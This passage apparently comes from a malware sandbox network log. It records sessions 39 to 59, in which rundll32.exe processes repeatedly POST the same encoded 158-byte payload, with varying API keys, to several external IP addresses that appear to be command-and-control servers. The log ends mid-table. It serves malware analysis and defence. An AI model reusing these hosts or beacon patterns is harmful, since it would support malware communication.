Jul 15, 2024 12:43:45.793064117 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:43:45 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	54508	77.238.250.123	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:45.208811998 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: hBDk2pOH Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:43:45.817708969 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:43:45 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	54509	195.2.70.38	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:46.231278896 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: HTRzftfj Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	54510	91.142.74.28	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:48.028928041 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 1VUmMnRK Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	54511	77.238.224.56	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:49.773189068 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: uF1dMd6G Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	54512	77.238.229.63	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:51.402601004 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: KbRvFTHD Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	54513	77.238.250.123	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:53.030189037 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: HnuTIQfC Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:43:53.640449047 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:43:53 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	54514	195.2.70.38	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:15.805043936 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 2wwTEamx Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	54515	195.2.70.38	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:15.827207088 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 8CVlfwCf Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	54516	91.142.74.28	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:17.536653996 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: cvZr0YpV Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	54517	91.142.74.28	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:17.572118998 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: SiQygADU Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	54518	77.238.224.56	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:19.685894012 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: CATGQu6q Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	54519	77.238.224.56	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:19.685962915 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: b262i35A Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	54520	77.238.229.63	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:21.307549000 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: UY3fQrql Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	54521	77.238.229.63	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:21.332927942 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 9NjQIDIY Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	54522	77.238.250.123	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:22.915278912 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: bM0smCMr Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:44:23.517585039 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:44:23 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	54523	77.238.250.123	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:22.949750900 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 60kmSLhK Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:44:23.544429064 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:44:23 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	54524	195.2.70.38	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:23.662302971 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ImuDvDE3 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	54525	91.142.74.28	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:25.415981054 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: U6RzQ6FO Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	54526	77.238.224.56	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:27.165242910 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: YquXIksf Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	54527	77.238.229.63	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:44:28.854330063 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: HWjhd7A6 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	54528	77.238.250.123	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
